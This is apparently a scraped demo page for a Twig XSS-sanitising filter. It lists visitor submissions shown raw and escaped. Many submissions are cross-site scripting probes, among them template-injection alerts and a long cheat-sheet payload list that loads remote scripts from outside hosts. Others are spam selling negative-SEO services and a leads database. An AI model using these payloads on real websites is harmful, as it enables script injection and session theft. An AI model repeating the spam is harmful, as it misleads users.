&#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Et ipsum esse volupt</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Et ipsum esse volupt</code> <p>keyword(s): Magnam pariatur Ani</p> <p>description: Sed placeat sint un</p> <p>by Laboriosam cupidita | at 2021-09-02 16:34:07</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">aa</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">aa</code> <p>keyword(s): aa</p> <p>description: {{constructor.constructor(\\\'alert&#40;\\\"XSS\\\"&#41;\\\')()}}</p> <p>by aa | at 2021-09-02 13:18:59</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Hi\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Hi\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n</code> <p>keyword(s): </p> <p>description: Hi\\r\\n\\r\\nIf you ever need Negative SEO to de-rank any site, you can hire us here\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n</p> <p>by Caren Bou | at 2021-09-01 01:33:24</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">We have an amazing database of leads for you.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nThis offer is valid till Friday.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nwww.SunDataGroup.one</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">We have an amazing database of leads for you.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nThis offer is valid till Friday.\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\nwww.SunDataGroup.one</code> <p>keyword(s): asdasd</p> <p>description: asdasd</p> <p>by asdasd | at 2021-08-31 02:51:23</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><img ></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;img src=\\\&quot;\\\&quot;&gt;&lt;script&gt;alert(123);&lt;/script&gt;</code> <p>keyword(s): </p> <p>description: <img ></p> <p>by <img > | at 2021-08-30 08:15:20</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Search results for \\\"xss\\\"\\r\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Search results for \\\&quot;xss\\\&quot;\\r\\n</code> <p>keyword(s): xss</p> <p>description: jittgk</p> <p>by liuoy7uykloxss | at 2021-08-29 11:29:28</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Search results for \\\"">xss/&lt;\\\"</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Search results for \\\&quot;&amp;quot;&amp;gt;xss/&amp;lt;\\\&quot;</code> <p>keyword(s): xss</p> <p>description: nooo</p> <p>by ali | at 2021-08-29 11:26:45</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">dsf</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">dsf</code> <p>keyword(s): dsf</p> <p>description: &lt;img &gt;kekekeke</p> <p>by dsf | at 2021-08-27 11:10:28</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><p >\\\"=\\\"x\\\">d0mxssd0mxss</p></p></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;p style=\\\&quot;xasd\\\&quot;\\\&quot;x&lt;strong&gt;\\\&quot;=\\\&quot;x\\\&quot;&gt;d0mxssd0mxss&lt;/p&gt;&lt;/p&gt;</code> <p>keyword(s): aasd</p> <p>description: asd</p> <p>by asd | at 2021-08-27 09:17:31</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">We have an amazing database of leads for you.\\r\\n\\r\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\r\\n\\r\\nThis offer is valid till Friday.\\r\\n\\r\\nwww.SunDataGroup.one</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">We have an amazing database of leads for you.\\r\\n\\r\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\r\\n\\r\\nThis offer is valid till Friday.\\r\\n\\r\\nwww.SunDataGroup.one</code> <p>keyword(s): </p> <p>description: We have an amazing database of leads for you.\\r\\n\\r\\nAll countries are $99 and you can buy the entire world 165 countries for $179.\\r\\n\\r\\nThis offer is valid till Friday.\\r\\n\\r\\nwww.SunDataGroup.one</p> <p>by Dewayne Langston | at 2021-08-27 04:16:49</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">test{{constructor.constructor(\\\'alert&#40;document.domain&#41;\\\')()}}</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">test{{constructor.constructor(\\\&#039;alert(document.domain)\\\&#039;)()}}</code> <p>keyword(s): </p> <p>description: </p> <p>by bb | at 2021-08-25 19:48:15</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">test{{constructor.constructor(\\\'alert&#40;document.domain&#41;\\\')()}}</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">test{{constructor.constructor(\\\&#039;alert(document.domain)\\\&#039;)()}}</code> <p>keyword(s): laravel, vue</p> <p>description: </p> <p>by bb | at 2021-08-25 19:47:22</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">sasas</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">sasas</code> <p>keyword(s): hjh</p> <p>description: jhghjgj</p> <p>by 111` | at 2021-08-24 14:13:24</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">ádsđ</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">ádsđ</code> <p>keyword(s): 123</p> <p>description: ádsdsd</p> <p>by abc | at 2021-08-23 17:57:06</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/script&gt;</code> <p>keyword(s): xss</p> <p>description: test xss</p> <p>by Sergey | at 2021-08-19 18:33:59</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;body alert&#40;\\\'XSS\\\'&#41;;\\\"&gt;\\r\\n\\\'\\\">&lt;/title&gt;\\r\\n&lt;/textarea&gt;\\\'\\\">\\r\\n\\\'\\\"\\\"> alert&#40;\\\'X \\\\nS \\\\nS\\\'&#41;;\\r\\n&lt;&lt;&lt;alert&#40;123&#41;\\r\\n&lt;html&gt;&lt;noalert&gt;&lt;noscript&gt;(123)&lt;/noscript&gt;\\r\\n&lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n\\\'&gt;&lt;/select&gt;\\r\\n\\\'&gt;\\\"&gt;\\r\\n}&lt;/style&gt;\\r\\n\\r\\na=\\\"get\\\";b=\\\"URL\\\";c=\\\"\\\";d=\\\"alert&#40;\\\'xss\\\'&#41;;\\\";eval&#40;a+b+c+d&#41;;\\r\\n=\\\'&gt;\\r\\n\\\"+src=\\\"http://yoursite.com/xss.js?69,69\\\"&gt;\\r\\n&lt;body background=\\\'\\\"&gt;&gt;&lt;/body&gt;\\r\\n\\\"&gt;/XaDoS/&gt;\\r\\n\\\"&gt;/KinG-InFeT.NeT/&gt;\\r\\nsrc=\\\"http://www.site.com/XSS.js\\\"&gt;\\r\\nIj48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\\r\\n!--\\\" /&gt;\\r\\n&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\"&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\'\\\"&gt;&lt;/title&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;img \\\"\\\"\\\"&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\"&gt;\\\"&gt;&lt;/marquee&gt;\\r\\n\\\'\\\"&gt;&lt;/title&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;iframe src=\\\"(\\\'XSS by \\\\nxss\\\');\\\"&gt;&lt;/iframe&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\'&gt;&lt;img &gt;&lt;img &gt;&lt;img &gt;\\\"&gt;\\r\\n&lt;img &gt;\\\&lt;\\\/\\\i\\\f\\\r\\\a\\\m\\\e\\\&gt;\\\');\\\"&gt;&lt;/img&gt;\\r\\n&lt;/body&gt;\\r\\n&lt;/html&gt;\\r\\n\\r\\n\\r\\n&lt;BODY &gt;\\r\\n&lt;BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\&gt;\\&gt;\\&gt;\\&gt;\\&gt;\\&gt;\\&gt;\\&gt;\\&gt;\\ HREF="('XSS');//" &gt;\\r\\n&lt;A HREF="http://66.102.7.147/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://www.google.com"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://1113982867/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://0x42.0x0000066.0x7.0x93/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://0102.0146.0007.00000223/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="h tt p://6 6.000146.0x7.147/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="//www.google.com/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="//google"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://ha.ckers.org@google"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://google:ha.ckers.org"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://google.com/"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://www.google.com./"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="'http://www.google.com/'"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF="http://www.gohttp://www.google.com/ogle.com/"&gt;XSS&lt;/A&gt;\\r\\n\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\&gt;\\ &gt;&gt;\\&gt;\\&gt;\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\&gt;\\&gt;\\&gt;&lt;/LAYER&gt;\\r\\n&lt;link REL=\\\"stylesheet\\\" HREF=\\\";\\\"&gt;\\r\\n&lt;style&gt;li {list-style-image: url(\\\";\\\");&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;img &gt;\\&gt;\\&gt;\\&gt;&lt;/iframe&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\";\\\"&gt;&lt;/frameset&gt;\\r\\n&lt;table BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;table&gt;&lt;TD BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;div url(;)\\\"&gt;\\r\\n&lt;div url(&#1;;)\\\"&gt;\\r\\n&lt;div document.vulnerable=true);\\\"&gt;\\r\\n&lt;style&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';&lt;/style&gt;\\r\\n&lt;img &gt;\\&gt;\\r\\nexp/*&lt;A &gt;\\r\\n&lt;style TYPE=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;style&gt;.XSS{background-image:url(\\\"\\\");}&lt;/STYLE&gt;&lt;A &gt;&lt;/a&gt;\\r\\n&lt;style type=\\\"text/css\\\"&gt;BODY{background:url(\\\"\\\")}&lt;/style&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;![endif]--&gt;\\r\\n&lt;base HREF=\\\";//\\\"&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=&gt;&lt;/object&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG &gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;\\r\\n&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG &gt;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/span&gt;\\r\\n&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSSdocument.vulnerable=true\\\"&gt;&lt;/BODY&gt;&lt;/html&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';echo(\\\'IPT&gt;document.vulnerable=true\\\'); ?&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\\\"&gt;\\r\\n&lt;head&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;a &gt;\\r\\n&lt;div &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;input type=\\\"image\\\" dynsrc=\\\";\\\"&gt;\\r\\n&lt;bgsound src=\\\";\\\"&gt;\\r\\n&\\r\\n&{document.vulnerable=true;};\\r\\n&lt;img &gt;\\&gt;\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;a &gt;document.vulnerable=true;\\\"&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\"&gt;\\r\\n&lt;body &gt;\\r\\n&lt;div url(;);\\\"&gt;\\r\\n&lt;div url([link to code]);\\\"&gt;\\r\\n&lt;div url([link to code]);\\\"&gt;\\r\\n&lt;div document.vulnerable=true;);\\\"&gt;\\r\\n&lt;style type=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;object classid=\\\"clsid:...\\\" codebase=\\\";\\\"&gt;\\r\\n&lt;style&gt;&lt;!--&lt;/style&gt;\\r\\n&lt;\\r\\n\\r\\n&lt;!-- -- --&gt;&lt;!-- -- --&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\\" =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;xml src=\\\";\\\"&gt;\\r\\n&lt;xml id=\\\"X\\\"&gt;&lt;a&gt;&lt;b&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;\\r\\n&lt;div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"&gt;&lt;/div&gt;\\r\\n[\\\\xC0][\\\\xBC]script&gt;document.vulnerable=true;[\\\\xC0][\\\\xBC]/script&gt;\\r\\n&lt;style&gt;@import\\\'http://www.securitycompass.com/xss.css\\\';&lt;/style&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;style&gt;BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}&lt;/style&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"&gt;&lt;/object&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;\\r\\n\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'&lt;SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js&gt;\\\'\\\"--&gt;\\r\\n\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n` SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n\\\'&gt;\\\" 